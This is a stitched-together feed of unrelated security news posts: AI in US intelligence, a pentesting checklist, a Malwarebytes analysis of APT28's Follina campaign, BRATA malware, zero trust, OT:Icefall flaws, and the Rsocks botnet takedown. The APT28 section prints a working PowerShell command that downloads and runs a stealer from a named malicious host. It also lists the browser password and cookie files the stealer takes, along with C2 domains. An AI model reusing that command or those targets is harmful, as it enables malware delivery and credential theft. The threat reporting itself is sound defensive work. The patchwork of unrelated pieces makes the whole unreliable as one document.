Artificial intelligence use is booming, but it's not the secret weapon you might imagine.

From cyber operations to disinformation, artificial intelligence extends the reach of national security threats that can target individuals and whole societies with precision, speed, and scale. As the US competes to stay ahead, the intelligence community is grappling with the fits and starts of the impending revolution brought on by AI.

The US intelligence community has launched initiatives to grapple with AI’s implications and ethical uses, and analysts have begun to conceptualize how AI will revolutionize their discipline, yet these approaches and other practical applications of such technologies by the IC have been largely fragmented.

As experts sound the alarm that the US is not prepared to defend itself against AI by its strategic rival, China, Congress has called for the IC to produce a plan for integration of such technologies into workflows to create an “AI digital ecosystem” in the 2022 Intelligence Authorization Act.

The term AI is used for a group of technologies that solve problems or perform tasks that mimic humanlike perception, cognition, learning, planning, communication, or actions. AI includes technologies that can theoretically survive autonomously in novel situations, but its more common application is machine learning or algorithms that predict, classify, or approximate empiric-like results using big data, statistical models, and correlation.

While AI that can mimic humanlike sentience remains theoretical and impractical for most IC applications, machine learning is addressing fundamental challenges created by the volume and velocity of information that analysts are tasked with evaluating today.

At the National Security Agency, machine learning finds patterns in the mass of signals intelligence collects from global web traffic. Machine learning also searches international news and other publicly accessible reporting by the CIA's Directorate of Digital Innovation, responsible for advancing digital and cyber technologies in human and open-source collection, as well as its covert action and all-source analysis, which integrates all kinds of raw intelligence collected by US spies, whether technical or human. An all-source analyst evaluates the significance or meaning when that intelligence is taken together, memorializing it into finished assessments or reports for national security policymakers.

In fact, open source is key to the adoption of AI technologies by the intelligence community. Many AI technologies depend on big data to make quantitative judgments, and the scale and relevance of public data cannot be replicated in classified environments.

Capitalizing on AI and open source will enable the IC to utilize other finite collection capabilities, like human spies and signals intelligence collection, more efficiently. Other collection disciplines can be used to obtain the secrets that are hidden from not just humans but AI, too. In this context, AI may supply better global coverage of unforeseen or non-priority collection targets that could quickly evolve into threats.

Meanwhile, at the National Geospatial-Intelligence Agency, AI and machine learning extract data from images that are taken daily from nearly every corner of the world by commercial and government satellites. And the Defense Intelligence Agency trains algorithms to recognize nuclear, radar, environmental, material, chemical, and biological measurements and to evaluate these signatures, increasing the productivity of its analysts.

In one example of the IC’s successful use of AI, after exhausting all other avenues—from human spies to signals intelligence—the US was able to find an unidentified WMD research and development facility in a large Asian country by locating a bus that traveled between it and other known facilities. To do that, analysts employed algorithms to search and evaluate images of nearly every square inch of the country, according to a senior US intelligence official who spoke on background with the understanding of not being named.

While AI can calculate, retrieve, and employ programming that performs limited rational analyses, it lacks the calculus to properly dissect more emotional or unconscious components of human intelligence that are described by psychologists as system 1 thinking.

AI, for example, can draft intelligence reports that are akin to newspaper articles about baseball, which contain structured non-logical flow and repetitive content elements. However, when briefs require complexity of reasoning or logical arguments that justify or demonstrate conclusions, AI has been found lacking. When the intelligence community tested the capability, the intelligence official says, the product looked like an intelligence brief but was otherwise nonsensical.

Such algorithmic processes can be made to overlap, adding layers of complexity to computational reasoning, but even then those algorithms can’t interpret context as well as humans, especially when it comes to language, like hate speech.

AI’s comprehension might be more analogous to the comprehension of a human toddler, says Eric Curwin, chief technology officer at Pyrra Technologies, which identifies virtual threats to clients from violence to disinformation. “For example, AI can understand the basics of human language, but foundational models don’t have the latent or contextual knowledge to accomplish specific tasks,” Curwin says.

“From an analytic perspective, AI has a difficult time interpreting intent,” Curwin adds. “Computer science is a valuable and important field, but it is social computational scientists that are taking the big leaps in enabling machines to interpret, understand, and predict behavior.”

In order to “build models that can begin to replace human intuition or cognition,” Curwin explains, “researchers must first understand how to interpret behavior and translate that behavior into something AI can learn.”

Although machine learning and big data analytics provide predictive analysis about what might or will likely happen, it can’t explain to analysts how or why it arrived at those conclusions. The opaqueness in AI reasoning and the difficulty vetting sources, which consist of extremely large data sets, can impact the actual or perceived soundness and transparency of those conclusions.

Transparency in reasoning and sourcing are requirements for the analytical tradecraft standards of products produced by and for the intelligence community. Analytic objectivity is also statuatorically required, sparking calls within the US government to update such standards and laws in light of AI’s increasing prevalence.

Machine learning and algorithms when employed for predictive judgments are also considered by some intelligence practitioners as more art than science. That is, they are prone to biases, noise, and can be accompanied by methodologies that are not sound and lead to errors similar to those found in the criminal forensic sciences and arts.

“Algorithms are just a set of rules, and by definition are objective because they’re totally consistent,” says Welton Chang, cofounder and CEO of Pyrra Technologies. With algorithms, objectivity means applying the same rules over and over. Evidence of subjectivity, then, is the variance in the answers.

“It’s different when you consider the tradition of the philosophy of science,” says Chang. “The tradition of what counts as subjective is a person's own perspective and bias. Objective truth is derived from consistency and agreement with external observation. When you evaluate an algorithm solely on its outputs and not whether those outputs match reality, that’s when you miss the bias built in.”

Depending on the presence or absence of bias and noise within massive data sets, especially in more pragmatic, real-world applications, predictive analysis has sometimes been described as “astrology for computer science.” But the same might be said of analysis performed by humans. A scholar on the subject, Stephen Marrin, writes that intelligence analysis as a discipline by humans is “merely a craft masquerading as a profession.”

Analysts in the US intelligence community are trained to use structured analytic techniques, or SATs, to make them aware of their own cognitive biases, assumptions, and reasoning. SATs—which use strategies that run the gamut from checklists to matrixes that test assumptions or predict alternative futures—externalize the thinking or reasoning used to support intelligence judgments, which is especially important given the fact that in the secret competition between nation-states not all facts are known or knowable. But even SATs, when employed by humans, have come under scrutiny by experts like Chang, specifically for the lack of scientific testing that can evidence an SAT’s efficacy or logical validity.

As AI is expected to increasingly augment or automate analysis for the intelligence community, it has become urgent to develop and implement standards and methods, which are both scientifically sound and ethical for law enforcement and national security contexts. While intelligence analysts grapple with how to match AI’s opacity to the evidentiary standards and argumentation methods required for the law enforcement and intelligence contexts, the same struggle can be found in understanding analysts’ unconscious reasoning, which can lead to accurate or biased conclusions.

The Power and Pitfalls of AI for US Intelligence

By Owais Sultan
Network pentesting is a frequently used and successful method of recognizing security issues in a company’s IT infrastructure.…
This is a post from HackRead.com Read the original post: Network Pentesting Checklist

Network pentesting is a frequently used and successful method of recognizing security issues in a company’s IT infrastructure. This entails completing a vulnerability scan of the IT system by “ethically hacking” equipment, protocols, or apps to simulate a real-world assault.

Pentesting, whether used in conjunction with a network pentesting checklist or via a vulnerability management service provider, may assist to minimize cyber security threats and guarantee that the data is not compromised in the event of a genuine attack.

By detecting system vulnerabilities, diagnosing live systems, and applications, and capturing system flags, network penetration testing identifies flaws in the system architecture.

**Benefits of Network Pentesting Checklist:**

Pentesting assists administrators in closing unneeded ports, enabling extra services, hiding or customizing banners, debugging services, & calibrating firewall rules. One must test everything to ensure there will be no security flaws.

Following a thorough Network pentesting checklist, the Tester is capable of recognizing all potential threats that the company faces. The network penetration tester’s findings assist firms in formulating an efficient approach to recognize & correct the problems uncovered during testing.

**1\. Discovering Information about Targeted System**

In the first phase of the network pentesting checklist, the tester assembles ample data related to the intended system architecture as feasible.

This must be evidence that can be beneficial to revealing security issues.

Experts utilized programs like Nmap to detect the IP information if they simply have IP addresses operated with.

Nmap is a program that extracts DNS archives for a single IP address.

With all of these programs, the tester will be capable of distinguishing different devices in the system infrastructure, their activity, and the application server they are using.

Since some software releases include security flaws, we’ll have these facts in phase two of the network penetration testing checklist.

The accessibility and availability of system holes are another critical piece of data to consider when constructing an assault scenario.

Tester is able to identify and enroll all open access points throughout the network using Nmap once more.

Malevolent hackers frequently utilize open ports to get illegal or hidden system access and download harmful malware.

**2\. Threat Modeling**

It’s time to put intelligence to work upon gathering data possible for the intended network.

The second stage in this network pentesting checklist is to utilize all discovered data to check the network for major weaknesses.

We’re merely attempting to gather a record of different weaknesses in the system at this stage, rather than assaulting them to check if they’re vulnerable.

While system testing can be used to detect network security problems, a more comprehensive approach incorporates human tests conducted by genuine experts.

At this phase, a network pentesting application like the Metasploit program obtains critical data about protection issues on an intended infrastructure. It detects all open holes, threats, and security issues on a chosen system with a really small proportion of false positives.

Other threat assessment software, such as Nessus, can help discover software flaws and data breaches.

Nmap may be used to detect security weaknesses for prospective attacks on the targeted system using statistics on windows os and releases.

Let’s move on to phase 3 now because we’ve discovered all of the possible flaws.

**3\. Inspection of Vulnerabilities**

First and foremost, remember not all issues are worthwhile exploiting.

The vulnerability scanning programs utilized during phase 2 generated reports; then it’s good to evaluate & classify the protection issues according to their severity and likelihood.

We may create an attack strategy to expose real-world attack pathways utilizing different types of data.

The purpose of the vulnerability analysis stage is to find an acceptable point for an attack so we don’t spend energy on useless chores.

We may also construct a graphical diagram at this phase to assist the tester to comprehend the basic infrastructure pathway. Testers also build proxies to utilize in the next phase to stay confidential: half of the penetration testing procedure is the identification and reaction to an intrusion. Is the intended firm’s IT personnel aware that an intruder has acquired reach to the open holes? We’ll see what happens.

Now that you’ve selected the most appealing targets for exposure, it’s important to figure out the best assault routes for the vulnerabilities you’ve discovered.

**4\. Exploitation**

Exploitation is the procedure of analyzing a system’s flaws to check if it can be misused or not. It permits the tester to explain to customers different issues they must address right away.

Metasploit is the exploiting program we frequently utilize in pentesting.

We might employ password cracking programs based on the complexity of the problem, to test the safety of system passwords.

Some significant unit testing operations that are frequently time-consuming may be included in this ethical hacking testing phase. Code injection, password hacking, stack overflow, and OS commands are just a few examples of how vulnerabilities may be exposed.

Based on the extent of the project, significant ethical hacking may be used at this phase.

The core of phase 4 is to hire the best-skilled specialists since this phase relies on clever poking by a live penetration tester.

**5\. Reporting & documenting network pentesting**

Not only must an excellent system pentest report provide a description of the whole pentesting process, but this should also provide a priority list of the weaknesses that need to be tackled.

A well-written penetration test document contains a description of security issues evidence and also screenshots of the assaults, and a defined roadmap for correcting all vulnerabilities uncovered.

Because network pentesting was created for this purpose.

**Conclusion:**

It is vital to adopt a reliable network pentesting technique at all times. Using the checklist, companies can see how a professionally educated expert might plan a massive system assault while at the same time avoiding all loopholes. Although there is not a single checklist that is fit for every network pentesting, the procedures outlined above should serve as a decent starting point for practically any business seeking a network pentesting guide.

**More Security, Vulnerability and Pentesting Topics**

*   5 Reasons You Should Learn About Cyber Security
*   Vulnerable smart alarms allowed hackers to track & turn off car engine
*   Thousands of Internet connected hot tubs vulnerable to remote attacks
*   Smartwatch vulnerability allowed hackers to overdose dementia patients
*   Download Kali Linux 2021.3 with Kali NetHunter on smartwatch, new tools

Network Pentesting Checklist

Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine.
The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine appeared first on Malwarebytes Labs.

_This blog post was authored by Hossein Jazi and Roberto Santos_.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations, including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence identified a document that had been weaponized with the Follina (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google. The discovery was also made independently by CERT-UA.

Follina is a recently-discovered zero-day exploit that uses the ms-msdt protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations.

**The malicious document**

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the Atlantic Council called “_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_” published on May 10 this year.

The lure asks “Will Putin use nuclear weapons in Ukraine?”

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268.frge.io/article.html.

The malicious HTML document

The HTML file uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme. The decoded script uses cmd to run PowerShell code that downloads and executes the final payload:

    "C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

**Payload Analysis**

The final payload is a variant of a stealer APT28 has used against targets in Ukraine before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup.

In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

A side-by-side comparison of two versions of the APT28 stealer

As with the previous variant, the stealer’s main pupose is to steal data from several popular browsers.

**Google Chrome and Microsoft Edge**

The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.

Debugging session showing how attackers are capable of stealing credentials

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies.

Cookie stealing code (Google Chrome)

Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

**Firefox**

This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite file that stores the cookies for each user.

Sysmon capturing access to cookies.sqlite file

In the case of passwords, the attackers attempt to steal logins.json, key3.db, key4.db, cert8.db, cert9.db, signons.sqlite.

Attackers will grab also passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (signons.sqlite, key3.db and cert8.db are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.

**Exfiltrating data**

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

The IMAP login event

The old variant of this stealer connected to mail\[.\]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc\[.\]com. Interestingly both are located in Dubai.

It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since Ukraine invasion.

**Protection**

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

**IOCs**

**Maldoc:  
**Nuclear Terrorism A Very Real Threat.rtf  
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

**Remote template (Follina):  
**http://kitten-268.frge\[.\]io/article.html

**Stealer:  
**http://kompartpomiar\[.\]pl/grafika/docx.exe  
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

**C2:  
**www.specialityllc\[.\]com

Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine

The BRATA Android banking Trojan is evolving into a persistent threat with a new phishing technique and event-logging capabilities.

An Android-based banking Trojan known as BRATA (short for Brazilian RAT Android) has evolved to incorporate new phishing techniques and capabilities to acquire GPS, overlay, SMS, and device management permissions.  

The Italian mobile security company Cleafy reported in a blog post this week that these changes align with an advanced persistent threat (APT) pattern of activity.

"Threat actors behind BRATA now target a specific financial institution at a time, and change their focus only once the targeted victim starts to implement consistent countermeasures against them," the blog post explained. "Then, they move away from the spotlight, to come out with a different target and strategies of infections."

The new variant, which is targeting the EU region by posing as specific bank applications, can also now perform event logging through its ability to sideload a second-stage piece of malware from its command-and-control (C2) server.

**Ability to Bypass MFA**

The threat actors operating the new malware variant (BRATA.A) are also expanding their capabilities to include a methodology for potentially bypassing SMS-based multifactor authentication (MFA).

The updated phishing technique can mimic a targeted bank's login page, part of the group's strategy to acquire personal information to be used later for social-engineering purposes.

"Once installed, the pattern of the attack is similar to other SMS stealers," according to the blog post. "This consists in the malicious app asking the user to change the default messaging app with the malicious one to intercept all incoming messages."

Credential harvesting is common in banking Trojans and stealer malware, but bypassing MFA is a bit more complicated.

"This functionality, along with BRATA's ability to remain undetected for prolonged periods of time, could potentially classify the threat actors as an APT," says Nicole Hoffman, senior cyber threat intelligence analyst at Digital Shadows.

**BRATA Actors Thinking About Future Development**

From the perspective of John Bambenek, principal threat hunter at Netenrich, the ability to request additional permissions on the device indicates what the attackers are thinking as far as future development.

"Not all the new features are actively collecting and transmitting data to the attacker, but future updates can change that," he says. "The actors are spending real effort to make sure they can maximize their success. Banks are constantly evolving, so attackers must do so also."

He adds that because mobile malware is typically still just an app, consumers can protect themselves by only installing apps from approved app stores and be wary when apps are asking for banking credentials.

"Financial institutions need to invest in behavioral analytics to detect stolen credential use against their online presence to prevent fraud against their consumers," Bambenek says.

In a statement provided to Dark Reading, the Cleafy Threat Intelligence team notes BRATA's evolution suggests the threat actors plan to diversify their business model, and consequently its income.

Cleafy's hypothesis is that BRATA is sold as malware-as-a-service (MaaS) to different groups, since the firm is tracking many variants of this malware hitting different countries across the globe.

"It has been observed that they started refactoring part of the malware, in order to tailor it according to the requests of their customers," the statement reads.

**Evolution of a Trojan**

In January, Cleafy discovered the group behind BRATA manipulating Android's factory reset to prevent victims from discovering or reporting and preventing illicit wire transfers. At that point, the malware campaigns were targeting Italian banks.

During the last year, BRATA was delivered through sideloading techniques, not through the official Google Play Store.

Cleafy recommends users pay particular attention to downloading apps from untrusted websites or whenever SMS is required to install an application.

"However, considering the Android 13 restriction for sideloaded apps, we do not exclude that in the future BRATA will be also delivered through official stores, like other famous malware have been trying to do in recent months (e.g. Sharkbot, Teabot etc.)," the statement continues.

Kaspersky first discovered BRATA in 2019 when it was simply spyware and targeted at users in Brazil.

BRATA Android Malware Evolves Into an APT

Zero trust isn’t just about authentication. Organizations can combine identity data with business awareness to address issues such as insider threat.

Zero trust is growing in popularity in enterprise security because not trusting users by default works really well to reduce risk. However, people start having unrealistic expectations when they conflate reducing risk with eliminating risk, says Nabil Zoldjalali, VP of technology innovation at Darktrace. There is a subtle difference between the two that security teams can’t overlook.  

“I can eliminate risk entirely if I have absolute no trust,” Zoldjalali says. What’s more realistic – and attainable – is to try to lower the amount of default trust to as close to zero as possible. Zero trust should be treated as “an ideal end-state,” he adds.

As long as people have access to applications, tools, and different pieces of software, there’s always going to be a level of inherent risk. The idea behind zero-trust architecture is to set up context-based access for each identity so that users only see and access the applications that are relevant to them.

Context-aware access takes into account different factors. A user logging in may see only three applications when logging in as opposed to all the applications belonging to the organization. That list may change depending on time, especially if there are certain times or dates when the user is not expected to use that application. Or a user logging in from a different location would also get a different level of access.

**Zero Trust Requires Business Visibility**

Zero trust makes sense for security practitioners because they focus on attacker behavior and all the way things can go wrong, Zoldjalali says. But focusing on the attacker too much can make it easy to forget to think about what is being protected. 

“We’re saying, ‘I don’t want to inherently trust anyone in my business because if something goes wrong, I want to lower the blast radius that’s associated to it,’ and that’s meaningful to us,” he says. “But it sounds funny to a nonsecurity person when we say, ‘Listen, the company doesn’t trust anyone.’”

For zero trust to really work, both approaches – lowering trust and developing a strong understanding and awareness of the business – are critical. Having that business awareness and wall-to-wall visibility gives security teams the context necessary for zero trust. It also allows them to verify that the zero-trust architecture is working as planned. For instance, if the organization’s rules for conditional access aren’t working when they should be, it would be hard for security teams to even know that is the case if they don’t understand the business, Zoldjalali says.

**Zero Trust Beyond Authentication**

The beauty of zero trust is that its effects go beyond authentication. Security teams can combine identity data with information about what happened in the environment _after_ authentication to detect and actually stop attacks, Zoldjalali says. Security teams can look at incidents and trace digital activity back to see what the authentication prompt looked like and how the user was identified. Based on that information, security staff can make changes to the group policy or adjust permissions.

Darktrace’s self-learning artificial intelligence (AI) learns the business so that it knows what activities would be considered part of normal operations, Zoldjalali explains. Because the AI technology looks for deviations from the norm, it doesn’t need to know what historic attacks looked like or understand what kind of attacks are currently ongoing. It just looks for something that is different. 

“With zero trust, we allow people to do what they normally do,” he says. The AI assesses significant deviations from the person’s normal behavior to determine whether there is a threat to the business. If there is, the AI takes action to address the threat.

This mindset is extremely useful when considering the insider threat. 

“Insiders don’t just wake up one morning and say, ‘Today I’m going to be a big threat to the business.’ There’s usually some kind of context and back story,” Zoldjalali says. There may be a specific incident that acts as a trigger or a pattern of issues that contributes to a sense of unhappiness. 

So at that point, the user action – such as an act of sabotage or data theft – looks “very, very different from how they normally behave,” he says. The user may be logging in at unusual hours, using different devices, going down different folder paths, or downloading more data than usual.

“Having an approach that’s fundamentally based on understanding the business is one of the best ways to have accurate anomaly detection,” Zoldjalali says. And with early detection, security teams can adjust context-based access policies to block the user’s activities.

“When you combine different approaches, that's where you start getting closer and closer to an ideal state \[for zero trust\]," he adds.

Reducing Risk With Zero Trust

Deep-dive study unearthed security flaws that could allow remote code execution, file manipulation, and malicious firmware uploads, among other badness.

A new analysis of data from multiple sources has uncovered a total of 56 vulnerabilities in OT products from 10 vendors, including notable ones such as Honeywell, Siemens, and Emerson.

Many of the vulnerabilities are the result of device vendors not including basic security mechanisms, such as authentication and encryption, in their technologies. Often they exist in older products that asset owners are continuing to use even though more secure options are available. Significantly, the vulnerabilities are present in products that have gone through some sort of auditing process and were certified as being safe for OT networks, a new study by Forescout found.

Researchers from Forescout’s Vedere Labs discovered the vulnerabilities from data they gathered via open source intelligence, Shodan search-engine queries, and customer networks. The vulnerabilities exist in widely used products and protocols in a range of critical infrastructure sectors, such as oil and gas, chemical, nuclear, and power generation. The security vendor released a report Tuesday highlighting the main findings from its study.

The vulnerabilities — collectively labeled “OT: Icefall” — stemmed from four primary reasons: insecure engineering protocols, weak cryptography or broken authentication mechanisms, insecure firmware updates, and native functions that enabled remote code execution. The bugs enabled a variety of malicious activity, including remote code execution, denial-of-service attacks, file and configuration manipulation, authentication bypass, and credential theft. Affected devices included programmable logic controllers, remote terminal units, engineering workstations, distribute control systems, and one supervisory control and data acquisition (SCADA) system.

**Insecure by Design**

The flaws were not introduced by programming and coding errors, says Daniel dos Santos, head of security research at Forescout. Rather, the technologies are vulnerable to attack because they are insecure by design, Santos says. They often lack critical controls like those needed to authenticate users and actions, encrypt data, and verify whether firmware updates and software are signed and verified. When these mechanisms are present, they are often weak and easily hacked or seriously undermined by other issues, like the presence of hard-coded and plaintext credentials on the device, insufficient randomness and broken crypto, or features that allow arbitrary file writes, he says.

“While it’s a semantic difference and ends up with the same vulnerabilities, it’s not so much they are 'insecure by design' as they are designed without security as a consideration,” says Mike Parkin, senior technical engineer at Vulcan Cyber. “Stronger security has been baked into newer OT equipment, but there is still a lot of kit out there where it just wasn’t a consideration." 

In many cases OT technology was designed with the idea that it would be isolated, protected from outside access, and not exposed to anything but its operational environment. “Unfortunately, the real world wasn’t quite so cleanly defined,” he says.

Foresight found numerous instances of vulnerabilities tied to poor design. For instance, 38% of the vulnerabilities that Forescout discovered allowed for credential compromise, and 21% gave attackers a way to introduce poisoned firmware into the environment. Fourteen percent of the flaws stemmed from native functionality — such as logic downloads, firmware updates, and memory read/write operations — that gave attackers a way to execute malicious code remotely on OT systems. 

For example, none of the affected systems supported logic signing, 62% accepted firmware downloads via Ethernet, and 51% authenticated such downloads. Nine of the 56 flaws that Forescout discovered were related to unauthenticated protocols.

**(Not) Certifiably Secure  
**

Disturbingly, nearly three-quarters — 74% — of the vulnerable product families had some sort of certification regarding their suitability for use in critical OT environments. Examples of such certifications included ISASecure Component Security Assurance, ISASecure System Security Assurance (SSA), GE Achilles Communications Certification, and ANSSI Certification de Sécurité de Premier Niveau. 

The fact that vulnerable products were certified as compliant with these standards suggests product evaluations were likely limited in scope, were too focused on functional testing, or were hobbled by opaque security definitions, Forescout said.

The presence of vulnerabilities stemming from insecure design in OT devices and protocols is troubling because of the growing attacker interest in these environments, Santos says. He points to ICS- and OT- specific malware such as Industroyer, Triton and Incontroller as evidence of the increasingly sophisticated capabilities that attackers have begun to deploy in attacking ICS and OT facilities. 

“There is still this lingering notion that attackers don’t understand the environment or proprietary OT technology,” Santos says. 

That is simply not true, he says. Nation-state actors and even well-resourced ransomware groups have demonstrated their ability to access OT environments. Detailed information on OT environments is also available in the public domain and equipment for testing out attacks are easily available in markets for used technology products, he notes.

“OT/ICS and IoT environments are becoming the preferred targets by cybercriminals, for many reasons,” says Bud Broomhead, CEO at Viakoo. 

Among them is the growing use of vulnerable open source components — such as Log4j — in OT/ICS environments and the fact that the systems are often managed outside the IT department. 

“Often OT/ICS teams lack the IT skills to maintain complete cyber hygiene” and are focused on operational issues instead, Broomhead says. As a result, there is little oversight over patching practices and password management. OT/ICS devices are often also not visible to IT, or sometimes to the organizations managing them. 

Another issue is that devices are often used well past the manufacturer's support time frame. 

“Many OT/ICS devices are in operation past the time the manufacturer is supporting patches or updates,” Broomhead says. “Security solutions used for IT systems do not work for OT/ISC environments. OT/ICS devices do not accept agents, and therefore organizations must implement solutions, such as for patching, certificate management, and password rotations specifically designed for OT/ISC environments.”

Parkin also urges organizations to pay attention to the fundamental security practices such as keeping patches up to date and implementing proper network segmentation and isolation to keep OT and ICS environments away from public access. 

“The management and control platforms should have proper isolation and authentication, including multi-factor authentication, and there should be some kind of traffic monitoring in place to make sure \[OT\] is only being accessed by authorized users from authorized locations,” he says.

56 Vulnerabilities Discovered in OT Products From 10 Different Vendors

AI can help companies more effectively identify and respond to threats, as well as harden applications.

Much has been made of the use of artificial intelligence in security. Some experts will tell you it is the single biggest key to success, while others will tell you that AI is little more than marketing jargon without any real-world value. I think the truth is somewhere in the middle. AI absolutely has a place in security, but it is not a silver bullet. With that said, there are three primary ways that organizations should be using AI to act as a force multiplier for security teams.

**1\. Attack Prevention**

The use of AI in security should be very focused on multiplying the efforts of security teams, especially considering the current shortage of security skills.

A recent report from JupiterOne found that security teams are responsible for more than 165,000 cyber assets across cloud workloads, devices, network assets, applications, data assets, and users. Trying to defend that many assets is a daunting task. In fact, according to a report by Capgemini Research Institute, 61% of organizations said they would not be able to identify critical threats without AI.

AI and machine learning can reduce the workload for analysts by automatically sifting through data logs and identifying relevant threats. When used effectively, artificial intelligence will not only alert security professionals to threats but also will classify types of attack, allowing security teams to prepare appropriate responses. With this type of ongoing, comprehensive analysis of behavior patterns, analysts can manage even complex threats with far less manual effort, reducing mistakes made due to burnout and exhaustion.

**2\. Intrusion Detection**

Prevention and detection go hand in hand because, as all security professionals know, a determined and skilled attacker will get in eventually. Identifying such a breach is highly dependent on anomaly detection, and this is another security area where AI shines. AI doesn’t get bored and tired like humans do while scanning through the never-ending tedium of operations logs looking for odd behavior.

AI can be even more help when it comes to alert fatigue, a boogeyman of our own creation. Our efforts to identify every possible threat has resulted in an overwhelming number of security alerts. However, most of the alerts that hit the security operations center are false positives that security teams have to wade through to find actual threats. AI can be used to help security teams spend their time and energy wisely by identifying which alerts need immediate attention, which can wait, and which can be ignored entirely.

**3\. Application Security and Developer Productivity**

One of the often-overlooked use cases for AI is application security. In today's competitive climate, companies are constantly launching new apps and updates. It's easy for AppSec teams to fall behind, and these challenges only snowball when vulnerabilities within code are discovered and both AppSec and development teams must divert their time and attention to remediating the issue.

As with attack prevention and intrusion detection, the key value proposition for AI in AppSec is acting as a force multiplier by taking on repetitive and menial tasks. Ensuring the delivery of a secure application involves going through hundreds or thousands of security findings to uncover relationships and gain insight into the risk a vulnerability represents. AI can significantly reduce the time AppSec teams sit with each new application launch or update so that they can focus on more intensive and important tasks.

**Conclusion**

There may be a day when AI is a security savior, but, for the time being, it can be incredibly valuable in helping security teams make sense of the mountains of data an enterprise generates and in ensuring that applications are launched securely.

AI Is Not a Security Silver Bullet

By Deeba Ahmed
The hackers behind Rsocks botnet used the hacked IoT devices as proxy servers where its customers would pay…
This is a post from HackRead.com Read the original post: Feds Dismantle Russian Rsocks Botnet Powered by Millions of IoT Devices

****The hackers behind Rsocks botnet used the hacked IoT devices as proxy servers where its customers would pay them for using the device’s IP address while the device owner remained unaware of the exploitation.****

The US Department of Justice (DoJ) seized and dismantled a Russian botnet infrastructure, the operators of which hijacked millions of devices across the globe to offer IP proxy service.

The prosecutors alleged that Rsocks was in use by an undisclosed, notorious Russian hacker(s) running a sophisticated cybercrime organization. The gang offered web proxy service after hacking into millions of IoT devices, computers, laptops, and Android smartphones.

**How did the Seizure happen?**

In a press release, the DoJ confirmed the involvement of law enforcement agencies from the UK, the Netherlands, and Germany in this operation launched in 2017 by the Federal Bureau of Investigation (FBI).

Seized Rsocks website

The bureau secretly purchased proxies from Rsocks to track its infrastructure and located at least 325,000 infected devices in the US. Prosecutors claimed that the botnet conducted cyber intrusions within the US and abroad.

**What are Proxy Servers?**

Proxy service operators provide access to IP addresses to interested users for a fee. Though not inherently illegal, the service manages to bypass censorship and access geo-restricted content for the user.

In the case of Rsocks’ botnet, the hackers used the devices as proxy servers. The customers would pay them for using the compromised devices’ IP address while the device owner remained unaware of the exploitation.

> “The owners of these devices did not give the RSOCKS operator(s) authority to access their devices in order to use their IP addresses and route internet traffic.”
> 
> Department of Justice

**A Botnet Comprising 8M Residential Devices**

As per the information shared by Rsocks on Twitter, the botnet had claimed 8 million residential devices and over a million mobile IPs. According to the prosecutors, Rsocks used brute force attacks to invade millions of devices and expand the botnet army illegally.

An archive copy of the now seized website

The operators not only victimized individuals and home businesses but also high-profile private and public entities, including a hotel, a university, a TV studio, and an electronics maker.

**How Was Rsocks Used?**

Reportedly, those intending to avail Rsocks proxies rented the access through an online storefront for different timelines and rates, ranging from $30/day for accessing 2,000 proxies to $200/day for 90,000 proxies.

After purchasing, the cybercriminals redirected malicious internet traffic via the IP addresses linked to the infected devices to hide their identity and launch various attacks such as credentials stuffing, hijacking social media accounts, or phishing messages.

This seizure comes just two weeks after the US authorities seized another illegal marketplace, SSNDOB, for stealing/selling the private data of around 24 million US citizens.

**More Botnet Seizure News**

